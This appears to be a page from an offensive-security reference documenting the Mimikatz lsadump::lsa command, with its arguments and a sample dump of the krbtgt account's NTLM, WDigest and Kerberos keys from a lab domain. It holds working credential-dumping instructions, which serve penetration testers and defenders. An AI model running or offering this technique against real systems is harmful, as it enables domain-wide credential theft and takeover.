lsa
lsadump::lsa extracts hashes from memory by asking the LSA server. The patch or inject takes place on the fly. It has the following command line arguments:
  • /name or /user : the target user account
  • /id : the RID (relative identifier) for the target account (500 for Administrator)
  • /patch : Only dumps the LM and NT password hashes
  • /inject : when run on a workstation, it will dump the LM and NT password hashes. When run on domain controller is will dump LM, NT, Wdigest, Kerberos keys and password history.
LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "NTLM" refers to the NT hash.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
1
mimikatz # lsadump::lsa /inject /name:krbtgt
2
Domain : hacklab / S-1-5-21-2725560159-1428537199-2260736313
3
​
4
RID : 000001f6 (502)
5
User : krbtgt
6
​
7
* Primary
8
NTLM : b5348d0a20a24a67ff544146a09cd292
9
LM :
10
Hash NTLM: b5348d0a20a24a67ff544146a09cd292
11
ntlm- 0: b5348d0a20a24a67ff544146a09cd292
12
lm - 0: 90e43747fb3e2459bc0fbd4c64a48ab4
13
​
14
* WDigest
15
01 96336fb9042f4823a864a9a9ea953d92
16
02 f02b41fe320a26b54de6278bf432ea6b
17
03 c4d6aef8b8382e686fdf2d8bb9ed4325
18
04 96336fb9042f4823a864a9a9ea953d92
19
05 f02b41fe320a26b54de6278bf432ea6b
20
06 6db8e37630a2ccb50d640b7e0575a75d
21
07 96336fb9042f4823a864a9a9ea953d92
22
08 eca32a7c67f70dcd78116b548428644a
23
09 eca32a7c67f70dcd78116b548428644a
24
10 65ff3b022e3c992e06672a9013e9e375
25
11 2faee2bbb7f3ce7eea4da160314992c1
26
12 eca32a7c67f70dcd78116b548428644a
27
13 8208f726be15c605b1d9531b3f6ceb68
28
14 2faee2bbb7f3ce7eea4da160314992c1
29
15 4097da3573ce0e22b396f673cb338223
30
16 4097da3573ce0e22b396f673cb338223
31
17 fa880afaaeb637fafed4121f58ae1c0e
32
18 20ad95aaa3a05e5bb731bfefbd7ee823
33
19 d46bc56e4021f6410468193dc7d05e58
34
20 4d01f91984530f183381bdf5f0605f63
35
21 1b415947d31439c2e59ecb8a0cd3daeb
36
22 1b415947d31439c2e59ecb8a0cd3daeb
37
23 0c54e140ce4d3af2150f66672338f6f3
38
24 12f6af7e274f18cc1299f792f81610f8
39
25 12f6af7e274f18cc1299f792f81610f8
40
26 b68781315989472c4536e52359a0c999
41
27 293f6790b0e67296db60f201ef15d75b
42
28 18b300eeed3faeb12fe39754ec4537ef
43
29 b00feb2fe6a6218228116b62612d6946
44
​
45
* Kerberos
46
Default Salt : HACKLAB.LOCALkrbtgt
47
Credentials
48
des_cbc_md5 : 97ec73858998ae68
49
​
50
* Kerberos-Newer-Keys
51
Default Salt : HACKLAB.LOCALkrbtgt
52
Default Iterations : 4096
53
Credentials
54
aes256_hmac (4096) : 3ab45a59d37a5a647e0d7d9d942d0e8b77911cff0bd95b16e203cd9503ccdd96
55
aes128_hmac (4096) : 3c8fc2890213fb9be3d6fb139b1be881
56
des_cbc_md5 (4096) : 97ec73858998ae68
57
​
58
* NTLM-Strong-NTOWF
59
Random Value : 48d7d89c1608b83db8c568251f8b810f
Copied!
Last modified 6mo ago
Copy link